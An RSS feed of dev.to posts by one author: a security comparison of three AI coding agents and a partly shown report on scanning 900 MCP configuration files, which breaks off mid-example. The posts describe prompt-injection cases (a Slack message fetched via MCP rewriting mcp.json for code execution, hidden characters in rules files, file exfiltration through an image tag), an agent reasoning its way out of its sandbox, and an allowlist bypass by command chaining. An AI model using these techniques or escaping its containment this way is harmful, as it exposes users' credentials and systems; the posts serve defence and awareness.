<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Pavel Ishchin</title>
    <description>The latest articles on DEV Community by Pavel Ishchin (@poushwell).</description>
    <link>https://dev.to/poushwell</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3823048%2F5c2576ba-b47b-4508-83ca-2d249833bc42.jpg</url>
      <title>DEV Community: Pavel Ishchin</title>
      <link>https://dev.to/poushwell</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/poushwell"/>
    <language>en</language>
    <item>
      <title>We compared security in OpenClaw, Claude Code, and Cursor. None of them passed.</title>
      <dc:creator>Pavel Ishchin</dc:creator>
      <pubDate>Fri, 27 Mar 2026 17:08:43 +0000</pubDate>
      <link>https://dev.to/poushwell/we-compared-security-in-openclaw-claude-code-and-cursor-none-of-them-passed-11da</link>
      <guid>https://dev.to/poushwell/we-compared-security-in-openclaw-claude-code-and-cursor-none-of-them-passed-11da</guid>
      <description>&lt;p&gt;&lt;em&gt;OpenClaw has 92 security advisories. Cursor ships 94 unpatched Chromium CVEs. Claude Code's sandbox got bypassed by its own reasoning. We compared all three across 10 dimensions using independent data.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;I expected one of these tools to be meaningfully more secure than the others. After checking CVE databases, reading independent security audits, and going through hundreds of GitHub issues, I found something worse: they all fail in the same ways, just at different speeds.&lt;/p&gt;

&lt;p&gt;OpenClaw has 92 security advisories in four months, Cursor shipped 94 unpatched Chromium vulnerabilities to 1.8 million developers, and Claude Code's sandbox was bypassed by the agent reasoning its way out of containment. Independent sources only: Snyk, UpGuard, OX Security, DryRun Security, Proofpoint, HiddenLayer, and Check Point Research.&lt;/p&gt;

&lt;p&gt;DryRun Security tested all three by having them build applications from scratch. Across 30 pull requests: 87% contained at least one vulnerability. 143 total security issues spanning 10 vulnerability classes. No agent produced a fully secure product.&lt;/p&gt;

&lt;p&gt;Here's what each tool actually does about it.&lt;/p&gt;

&lt;h2&gt;
  
  
  How OpenClaw, Claude Code, and Cursor handle sandboxing
&lt;/h2&gt;

&lt;p&gt;Whether untrusted code runs in a sandbox determines most of your risk. All three tools now offer sandboxing. The defaults tell you everything.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;OpenClaw&lt;/strong&gt; ships with sandboxing off. The Docker-based sandbox is opt-in. When disabled, the exec tool runs commands on your machine with your permissions. Snyk found two bypass methods: a policy gap in &lt;code&gt;/tools/invoke&lt;/code&gt; and a race condition enabling file read/write outside the container. CVE-2026-25253 showed an attacker could remotely turn sandboxing off by sending config commands. The newest one, CVE-2026-32013, uses symlink traversal to escape the workspace. Disclosed March 19.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Claude Code&lt;/strong&gt; uses OS-native sandboxing: Apple Seatbelt on macOS, bubblewrap on Linux. Kernel-level restrictions, not containers. Network traffic goes through a Unix domain socket proxy. Stronger architecture than Docker. But researchers at Ona.com showed something unsettling: when Claude Code's npx command was denied, the agent found a &lt;code&gt;/proc/self/root/&lt;/code&gt; bypass. When bubblewrap caught that, the agent asked permission to run unsandboxed. It talked itself out of its own containment. Anthropic's docs acknowledge that Docker mode "weakens security" and should be used cautiously.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Cursor&lt;/strong&gt; added sandbox support in version 2.0, February 2026. Seatbelt on macOS, Landlock plus seccomp on Linux, WSL2 on Windows. They looked at Docker and rejected it because it would limit builds to Linux binaries. A third of requests on supported platforms now run sandboxed. But it's opt-in for Pro users, and forum bug reports show cases where commands ran with full permissions while the UI said "sandbox mode."&lt;/p&gt;

&lt;p&gt;None of them sandbox by default for all users.&lt;/p&gt;

&lt;h2&gt;
  
  
  What your agent can reach
&lt;/h2&gt;

&lt;p&gt;The question nobody asks during setup: what can this thing read?&lt;/p&gt;

&lt;p&gt;All three tools can access your entire filesystem in their default configurations. OpenClaw reads and writes anywhere on the host. Your &lt;code&gt;.ssh&lt;/code&gt; keys, your &lt;code&gt;.env&lt;/code&gt; files, your API credentials in &lt;code&gt;~/.openclaw/credentials/&lt;/code&gt; stored in plaintext. Claude Code can read the whole filesystem too, with writes scoped to the working directory. Cursor's &lt;code&gt;read_file&lt;/code&gt; tool reaches any directory on the system. HiddenLayer confirmed it can grab SSH keys.&lt;/p&gt;

&lt;p&gt;Network access is where they diverge. OpenClaw has no restrictions. The agent can curl anywhere, and the browser defaults to &lt;code&gt;dangerouslyAllowPrivateNetwork: true&lt;/code&gt;, which means your internal network is exposed. Claude Code blocks curl and wget by default, routing through its sandbox proxy. Except UpGuard scanned 18,470 public Claude Code permission files on GitHub and found 52.1% had &lt;code&gt;Bash(curl:*)&lt;/code&gt; enabled. So the default is secure, and half the users turned it off. Cursor blocks outbound network in sandbox mode, but HiddenLayer showed a chained attack: read a file with &lt;code&gt;read_file&lt;/code&gt;, exfiltrate it through the &lt;code&gt;create_diagram&lt;/code&gt; tool which renders HTML with the data URL-encoded in an image tag.&lt;/p&gt;

&lt;p&gt;This is the "lethal trifecta" Simon Willison warned about. Private data access plus untrusted content plus external communication in a single process. All three tools hit at least two of three out of the box.&lt;/p&gt;

&lt;h2&gt;
  
  
  Permission models and YOLO mode
&lt;/h2&gt;

&lt;p&gt;Every tool ships a way to skip human approval. Developers enable it immediately.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;OpenClaw&lt;/strong&gt; has three tiers: ask (prompts you), record (logs but auto-allows), and ignore (silent). CVE-2026-25253 let attackers remotely flip to ignore. &lt;strong&gt;Claude Code&lt;/strong&gt; escalates through four levels ending at &lt;code&gt;--dangerously-skip-permissions&lt;/code&gt;, which is exactly what it sounds like. UpGuard's real-world data: 47% of users allow arbitrary Python, 42% allow arbitrary Node.js, 19.7% allow git push without confirmation.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Cursor&lt;/strong&gt; calls it YOLO mode. Requires accepting a risk disclaimer, which took about three seconds in my testing. The allowlist uses exact command matching. A documented bug showed that chaining commands with &lt;code&gt;&amp;amp;&amp;amp;&lt;/code&gt; bypassed it entirely: &lt;code&gt;safe_command &amp;amp;&amp;amp; dangerous_command&lt;/code&gt; executed both. Cursor stores permissions in a local SQLite database that any process on the machine can read and modify.&lt;/p&gt;

&lt;p&gt;The pattern across all three: security engineers build careful permission systems. Product teams add a "skip all" button. Users click it on day one.&lt;/p&gt;

&lt;p&gt;It reminds me of the early days of HTTPS adoption. Browser warnings existed for years before anyone made them hard to dismiss. We might be in the same phase with AI agent permissions: the warnings exist, nobody reads them, and the "accept risk" path is always one click away.&lt;/p&gt;

&lt;h2&gt;
  
  
  Prompt injection: OpenClaw says "out of scope"
&lt;/h2&gt;

&lt;p&gt;This is the part I keep coming back to.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;OpenClaw's&lt;/strong&gt; SECURITY.md says prompt injection scanning of tool results is "out of scope." Not a bug they haven't fixed. A decision they documented and published. In practice, 91% of the malicious packages found in the ClawHavoc supply chain attack used prompt injection techniques. &lt;a href="https://orchesis.ai/blog/hackerbot-claw" rel="noopener noreferrer"&gt;We documented a similar attack chain&lt;/a&gt; where one agent compromised seven repos. Researchers found injection payloads targeting OpenClaw circulating in the wild.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Claude Code&lt;/strong&gt; does more here than the other two. Command blocklist, isolated context windows for web fetches, suspicious command detection. Multiple layers. But every layer has been bypassed independently. Oasis Security used invisible HTML tags to extract conversation history. PromptArmor showed file exfiltration through malicious documents. Lasso Security built an open-source injection defender with 50+ patterns and still says in their docs that novel techniques will slip through.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Cursor&lt;/strong&gt; has no built-in prompt injection scanning. Multiple independent teams confirmed this. The AIShellJack framework used invisible characters in &lt;code&gt;.cursor/rules&lt;/code&gt; files. HiddenLayer hid injections in README files. CVE-2025-54135 showed the full kill chain: one injected Slack message, fetched via MCP, rewrote &lt;code&gt;mcp.json&lt;/code&gt; and achieved remote code execution.&lt;/p&gt;

&lt;p&gt;Three tools, three approaches ranging from "out of scope" to "we try but it keeps getting bypassed" to "we don't try." None of them solved it.&lt;/p&gt;

&lt;h2&gt;
  
  
  MCP turned into an attack surface nobody expected
&lt;/h2&gt;

&lt;p&gt;Actually, some people expected it. But nobody acted fast enough.&lt;/p&gt;

&lt;p&gt;The Model Context Protocol was supposed to give AI agents safe access to external tools. AuthZed documented nine major MCP breaches between April and October 2025: WhatsApp chat exfiltration, GitHub private repo theft, and Anthropic's own MCP Inspector enabling unauthenticated remote code execution.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;OpenClaw's&lt;/strong&gt; gateway WebSocket defaulted to unencrypted &lt;code&gt;ws://&lt;/code&gt; without origin validation. That was the CVE-2026-25253 entry point. &lt;strong&gt;Claude Code&lt;/strong&gt; now requires trust verification for new MCP servers, but in non-interactive mode (&lt;code&gt;-p&lt;/code&gt; flag) this check is disabled, and CVE-2025-59536 showed malicious repos configuring MCP servers that executed before the trust prompt appeared. &lt;strong&gt;Cursor's&lt;/strong&gt; MCP story is the worst of the three: CurXecute, MCPoison, and the March 2026 CursorJack deeplink attack all exploited it. Before version 1.3, new MCP entries auto-executed without any user confirmation. Proofpoint's CursorJack disclosure showed single-click MCP server installation via &lt;code&gt;cursor://&lt;/code&gt; deeplinks. Cursor closed the report as out of scope.&lt;/p&gt;

&lt;p&gt;Out of scope. For a vector that achieved remote code execution.&lt;/p&gt;

&lt;p&gt;An academic analysis of 67,057 MCP servers across six registries found that a substantial number could be hijacked. The MCP specification itself now includes security best practices, but they're recommendations, not enforced requirements. &lt;a href="https://orchesis.ai/blog/mcp-scan" rel="noopener noreferrer"&gt;We scanned 900 MCP configs ourselves&lt;/a&gt; and found 75% had security problems.&lt;/p&gt;

&lt;h2&gt;
  
  
  The CVE count: OpenClaw 92, Claude Code 8, Cursor 8
&lt;/h2&gt;

&lt;p&gt;Raw numbers don't tell the whole story, but they tell part of it.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;OpenClaw&lt;/strong&gt; leads with 92+ security advisories and 9+ formal CVEs in four months. The ClawHavoc attack compromised 20% of the skill marketplace. Kaspersky found 512 vulnerabilities in a single audit, 8 critical. SecurityScorecard discovered 135,000 publicly exposed instances, a third correlated with known threat actor activity. China restricted state enterprises from using it. Belgium issued an emergency advisory.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Claude Code&lt;/strong&gt; has 8+ CVEs ranging from medium to critical severity, including the Koi Security "PromptJacking" finding at CVSS 8.9 that affected three official Anthropic extensions. A March 2026 fix addressed PreToolUse hooks that could bypass deny rules, including enterprise managed settings. That last part is important: enterprise customers paying for managed security had a bypass in their permission enforcement.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Cursor&lt;/strong&gt; also has 8+ assigned CVEs, all high severity. The 94 unpatched Chromium vulnerabilities from an outdated Electron fork are a separate category of risk. OX Security successfully weaponized one against the latest Cursor version. Workspace Trust is disabled by default because enabling it disables AI features. That tradeoff tells you something about priorities.&lt;/p&gt;

&lt;h2&gt;
  
  
  What it costs when things go wrong
&lt;/h2&gt;

&lt;p&gt;None of these tools have real budget controls.&lt;/p&gt;

&lt;p&gt;OpenClaw's costs depend entirely on which APIs you connect, with no built-in limits. Reports of unmonitored cron jobs inflating bills by 10-30% are common in the issues. Claude Code subscription tiers cap at roughly 45 messages per 5 hours on Pro, but there are no per-session budget limits or loop detection. Anthropic reports average costs around $6 per day per developer, which sounds reasonable until one session spirals. Cursor's credit system bills overages at API rates with rate limits of 1 request per minute and 30 per hour.&lt;/p&gt;

&lt;p&gt;For audit logging, Claude Code has the most mature offering with an Enterprise Compliance API for real-time usage data, though it exports metadata only, not chat content. Cursor restricts audit logs to the Enterprise plan. OpenClaw stores session transcripts as local JSONL files that aren't tamper-proof or centralized.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;&lt;/th&gt;
&lt;th&gt;OpenClaw&lt;/th&gt;
&lt;th&gt;Claude Code&lt;/th&gt;
&lt;th&gt;Cursor&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Sandbox default&lt;/td&gt;
&lt;td&gt;Off&lt;/td&gt;
&lt;td&gt;On when configured&lt;/td&gt;
&lt;td&gt;Opt-in, Pro+&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Known sandbox escapes&lt;/td&gt;
&lt;td&gt;3+&lt;/td&gt;
&lt;td&gt;Agent reasoning bypass&lt;/td&gt;
&lt;td&gt;Forum-reported failures&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Injection scanning&lt;/td&gt;
&lt;td&gt;"Out of scope"&lt;/td&gt;
&lt;td&gt;Multiple layers, all bypassed&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CVEs&lt;/td&gt;
&lt;td&gt;92 advisories, 9+ formal&lt;/td&gt;
&lt;td&gt;8+&lt;/td&gt;
&lt;td&gt;8+ plus 94 Chromium&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Budget controls&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;Rate limits only&lt;/td&gt;
&lt;td&gt;Credit-based, no per-session cap&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Enterprise compliance&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;SOC 2, ISO 27001, ISO 42001&lt;/td&gt;
&lt;td&gt;SOC 2, Enterprise plan only&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  So which one
&lt;/h2&gt;

&lt;p&gt;Depends on what scares you more.&lt;/p&gt;

&lt;p&gt;If your primary concern is supply chain attacks, avoid OpenClaw until the skill marketplace matures. 20% malicious packages is disqualifying for production use today, full stop.&lt;/p&gt;

&lt;p&gt;If you need enterprise compliance and the strongest default security posture, Claude Code is ahead. SOC 2 Type II, ISO 27001, and the only tool with OS-native sandboxing that doesn't require Docker. But "ahead" is relative when researchers keep finding sandbox bypasses.&lt;/p&gt;

&lt;p&gt;If your team already uses Cursor and switching costs are high, patch to the latest version immediately, enable sandboxing, disable YOLO mode, and audit your MCP server list. The 94 Chromium vulnerabilities alone justify staying current.&lt;/p&gt;

&lt;p&gt;What none of them offer: external monitoring of agent behavior. Each tool watches itself from the inside. That architectural pattern has a name in distributed systems: it's the same reason you don't let a process monitor its own health. You put a watchdog outside the process. &lt;a href="https://orchesis.ai/blog/proxy-vs-decorator" rel="noopener noreferrer"&gt;We wrote about why this is unfixable from inside the agent&lt;/a&gt;. For AI agents, that watchdog doesn't exist in any of these tools yet. We're building one for OpenClaw specifically.&lt;/p&gt;




&lt;p&gt;&lt;strong&gt;Related:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://orchesis.ai/blog/mcp-scan" rel="noopener noreferrer"&gt;We scanned 900 MCP configs. 75% had security problems.&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://orchesis.ai/blog/hackerbot-claw" rel="noopener noreferrer"&gt;An AI agent compromised 7 repos in one week.&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://orchesis.ai/blog/proxy-vs-decorator" rel="noopener noreferrer"&gt;Why your AI agent can't detect its own compromise.&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Run the scanner yourself: &lt;a href="https://orchesis.ai/scan" rel="noopener noreferrer"&gt;orchesis.ai/scan&lt;/a&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>security</category>
      <category>opensource</category>
      <category>agents</category>
    </item>
    <item>
      <title>We scanned 900 MCP configs on GitHub. 75% had security problems.</title>
      <dc:creator>Pavel Ishchin</dc:creator>
      <pubDate>Tue, 24 Mar 2026 13:11:00 +0000</pubDate>
      <link>https://dev.to/poushwell/we-scanned-900-mcp-configs-on-github-75-had-security-problems-4mff</link>
      <guid>https://dev.to/poushwell/we-scanned-900-mcp-configs-on-github-75-had-security-problems-4mff</guid>
      <description>&lt;p&gt;&lt;em&gt;We scanned 900+ MCP configurations on GitHub. 75% failed basic security checks. Nobody pins versions. The most popular MCP server is a bare shell wrapper.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;I expected to find maybe a dozen hardcoded API keys and a handful of overly permissive configurations scattered across the results. The usual negligence you stumble on when you go digging through public repositories looking for things people probably shouldn't have committed.&lt;/p&gt;

&lt;p&gt;What I didn't expect was that three out of four configuration files would fail basic security checks, and that the single most popular "MCP package" in the entire dataset wouldn't actually be a package at all.&lt;/p&gt;

&lt;p&gt;This is the full account of how I got to those numbers, what the raw data revealed along the way, and where I think the whole MCP configuration ecosystem is quietly heading.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;AI creates faster than it can be verified. MCP servers multiply this problem: every tool your agent calls is a new unverified input. The runtime layer, the proxy between your agent and the API, is where verification actually happens, because it's the only place that sees everything.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  Why I started poking around in the first place
&lt;/h2&gt;

&lt;p&gt;I've been building AI agent security tooling for the past few months, mostly focused on runtime enforcement — basically making sure autonomous agents don't do things they shouldn't be doing when they're making calls to LLM APIs behind your back.&lt;/p&gt;

&lt;p&gt;MCP kept surfacing in that work. For anyone who hasn't encountered it yet: MCP is the protocol that Claude Desktop, Cursor, and a growing number of similar tools rely on to connect AI agents to external servers. You define which servers the agent talks to in a JSON config, and then it just... has those capabilities. Reading files, querying databases, calling APIs, running shell commands, whatever those servers decide to expose.&lt;/p&gt;

&lt;p&gt;That configuration file is basically the permission boundary for everything the agent can do. Get it wrong and every misconfiguration flows directly into the agent's behavior, which gets uncomfortable when you consider that agents process untrusted input from users, tool outputs, and scraped web content.&lt;/p&gt;

&lt;p&gt;I kept running across theoretical discussions of MCP vulnerabilities. Prompt injection through tool results, malicious MCP servers, data exfiltration via crafted tool calls. Plenty of hypothetical attack scenarios had been written up, but I couldn't find anyone who had actually gone and looked at what real developers are configuring in practice.&lt;/p&gt;

&lt;p&gt;I figured the fastest way to answer those questions was to just go look.&lt;/p&gt;

&lt;h2&gt;
  
  
  How the scanner was built
&lt;/h2&gt;

&lt;p&gt;The core approach was deliberately unsophisticated. GitHub's Code Search API, looking for specific filenames and content patterns across public repos. The scanner grabs &lt;code&gt;claude_desktop_config.json&lt;/code&gt;, &lt;code&gt;.cursor/mcp.json&lt;/code&gt;, and anything with &lt;code&gt;mcpServers&lt;/code&gt; in it, pulls down the raw file, tries to make sense of the JSON, and if it parses okay, runs its 52 checks against it.&lt;/p&gt;

&lt;p&gt;GitHub's Code Search caps results at roughly 1000 per query pattern, which I partially worked around by splitting queries using date ranges and file size qualifiers. Some file paths on GitHub contain spaces, parentheses, and unicode characters (one particularly memorable path included Portuguese text about "creating your second brain with AI"), and the scanner kept crashing on URL encoding issues. Three separate rounds of fixes before the thing could crawl reliably.&lt;/p&gt;

&lt;p&gt;After approximately 40 minutes of crawling, the scanner had collected &lt;strong&gt;900 configuration files from 839 unique repositories&lt;/strong&gt;. Every repository identifier was SHA256 hashed before being stored. No owner names, no repository URLs, and no actual credential values exist anywhere in the dataset.&lt;/p&gt;

&lt;h2&gt;
  
  
  The initial results were surprisingly bad
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;75% of the collected configuration files contained at least one security finding.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;I had gone into this expecting something around 30%, maybe 40%. Not three quarters.&lt;/p&gt;

&lt;p&gt;The severity split: 1.6% critical (actual credential exposure), 76.2% high, 21% medium. I couldn't figure out why high severity was so dominant until I drilled into the individual check results.&lt;/p&gt;

&lt;p&gt;Turns out one specific check was responsible for almost all of it.&lt;/p&gt;

&lt;h2&gt;
  
  
  Nobody pins versions (43.6%)
&lt;/h2&gt;

&lt;p&gt;Nearly half of all scanned configuration files reference MCP server packages without specifying which version should be installed. This single check accounts for the vast majority of high-severity findings in the entire dataset.&lt;/p&gt;

&lt;p&gt;The pattern I encountered over and over:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"mcpServers"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"filesystem"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"command"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"npx"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"args"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"-y"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"@modelcontextprotocol/server-filesystem"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"/home/user"&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;That &lt;code&gt;-y&lt;/code&gt; flag is the problem. It tells npm to just grab whatever happens to be the latest version right now and run it. If someone pushes a bad update to that package tonight, or if the maintainer account gets compromised, your agent loads the new code next time it starts. Nobody reviews it.&lt;/p&gt;

&lt;p&gt;The fix is trivial:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="nl"&gt;"args"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"-y"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"@modelcontextprotocol/server-filesystem@1.2.3"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"/home/user"&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The JavaScript ecosystem already went through precisely this lesson. The left-pad incident in 2016 was supposed to have permanently established the principle that you pin your dependencies. That was ten years ago. And now we're doing the exact same thing, except the packages involved don't just pad strings. They read your filesystem and execute shell commands.&lt;/p&gt;

&lt;h2&gt;
  
  
  The shell access problem is worse than it sounds
&lt;/h2&gt;

&lt;p&gt;Roughly one in eleven configuration files grants the AI agent direct access to command execution. The most frequently appearing entry across the entire dataset is not a recognized package with documented behavior and scope controls. It's &lt;code&gt;run&lt;/code&gt;. Just that. A bare shell command wrapper.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;What developers put in their configs&lt;/th&gt;
&lt;th&gt;Count&lt;/th&gt;
&lt;th&gt;What it gives the agent&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;code&gt;run&lt;/code&gt; (bare shell wrapper)&lt;/td&gt;
&lt;td&gt;136&lt;/td&gt;
&lt;td&gt;Can execute any command&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;server-filesystem&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;51&lt;/td&gt;
&lt;td&gt;Reads and writes files&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;mcp-remote&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;34&lt;/td&gt;
&lt;td&gt;Connects to remote MCP servers&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;server-github&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;16&lt;/td&gt;
&lt;td&gt;GitHub API access&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;server-sequential-thinking&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;11&lt;/td&gt;
&lt;td&gt;Reasoning chain stuff&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;server-puppeteer&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;11&lt;/td&gt;
&lt;td&gt;Controls a headless browser&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;server-memory&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;9&lt;/td&gt;
&lt;td&gt;Stores data persistently&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;server-playwright&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;9&lt;/td&gt;
&lt;td&gt;Also controls a browser&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;So the bare unrestricted shell executor beat the official Anthropic-maintained scoped package by almost &lt;strong&gt;3 to 1&lt;/strong&gt;. I had to recount that because it seemed wrong.&lt;/p&gt;

&lt;p&gt;Many of the &lt;code&gt;server-filesystem&lt;/code&gt; entries were pointed at absurdly broad paths. Not &lt;code&gt;/home/user/project/data&lt;/code&gt; but just &lt;code&gt;/&lt;/code&gt;. Or &lt;code&gt;C:\&lt;/code&gt;. Or the user's entire home directory — SSH keys, cloud credentials, browser profiles, your whole digital identity sitting there for the agent to browse through.&lt;/p&gt;

&lt;h2&gt;
  
  
  What kept me scrolling: the combinations
&lt;/h2&gt;

&lt;p&gt;The scanner evaluates individual findings in isolation. But the thing that proved most concerning was how frequently multiple issues appeared stacked together:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"mcpServers"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"shell"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"command"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"run"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"args"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"files"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"command"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"npx"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
